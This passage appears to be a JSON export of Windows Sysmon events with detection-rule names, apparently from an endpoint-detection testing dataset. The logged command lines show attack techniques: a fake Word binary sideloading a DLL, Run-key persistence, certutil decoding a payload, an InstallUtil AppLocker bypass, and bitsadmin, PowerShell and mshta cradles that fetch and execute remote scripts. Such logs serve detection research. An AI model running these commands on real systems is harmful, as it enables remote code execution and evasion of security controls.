Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=60E3F357B06AF9EB84FB9019BF08FB4DD109D4EC,MD5=AA0CA518E66F290FE0BAC6169473E8A9,SHA256=0D7CB0B75CD61CDFFE0E53910829FFA5C02C8759EBD27A49E2EF7A907A10E506,IMPHASH=FBEBD61CE702929C1F33B522FD572C5D","Image":"C:\\Windows\\SysWOW64\\explorer.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8EC-5F8A-0000-001094207300","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:40.835"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417081,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:40.902894Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Microsoft Office 
Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F1-5F8A-0000-00108B4B7300","ProcessId":1576,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:45.116"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417083,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:45.120170Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c ping 127.0.0.1&&del del /F /Q /A:H \"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A","Image":"C:\\Windows\\SysWOW64\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F5-5F8A-0000-00106B6F7300","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:49.217"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417085,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:49.229742Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-27 15:57:25.868","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-7ACC-5CC4-0000-0010B2470300","ProcessId":2772,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","UtcTime":"2019-04-27 
15:57:25.868"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6575,"Execution":{"#attributes":{"ProcessID":1912,"ThreadID":996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T15:57:25.868863Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6579,"Execution":{"#attributes":{"ProcessID":1912,"ThreadID":996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-27 
15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmartMax.dll","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6581,"Execution":{"#attributes":{"ProcessID":1912,"ThreadID":996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Roaming\\svchost.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-0010F9530C00","ProcessId":2992,"RuleName":"technique_id=T1060,technique_name=Registry Run Keys / Start Folder","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\360v","UtcTime":"2019-04-27 15:57:53.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6593,"Execution":{"#attributes":{"ProcessID":1912,"ThreadID":996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T15:57:53.884488Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil 
Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ProcessId":3184,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:32:58.614"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4888,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:32:58.659405Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ParentProcessId":3184,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010FFF28500","ProcessId":700,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:32:58.940"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4890,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:32:59.234755Z"}},"Version":5}}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ProcessId":2948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4893,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:03.254713Z"}},"Version":5}}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-00109B328600","ParentProcessId":6020,"ProcessGuid":"747F3D96-660F-5D3F-0000-00100F4F8600","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.667"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4894,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:03.886611Z"}},"Version":5}}}},{"detection":["Suspicious Bitsadmin Job via PowerShell","Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ParentProcessId":2948,"ProcessGuid":"747F3D96-660F-5D3F-0000-00106B508600","ProcessId":6720,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.695"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4895,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:03.966393Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ProcessId":108,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:08.174"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4897,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:08.202018Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":".NET Framework installation utility","FileVersion":"4.7.3190.0 built by: 
NET472REL1LAST_C","Hashes":"SHA1=1BEB7CDC82F57269A4AD123BE7F8B72F7F1B4630,MD5=7CCB088EEFBF464D0A467D0FF4C619DA,SHA256=0389427DA1D97388D89F28C2D856CD871FC200562C51749C6F6EF4FED9087FAE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ParentProcessId":108,"ProcessGuid":"747F3D96-6614-5D3F-0000-0010BFD98600","ProcessId":5696,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:08.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4899,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:08.446374Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6619-5D3F-0000-0010FDE78600","ProcessId":5116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:13.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4900,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:13.214691Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ProcessId":776,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:18.241"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4902,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:18.286776Z"}},"Version":5}}}},{"detection":["Mshta JavaScript Execution","Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.17763.1 
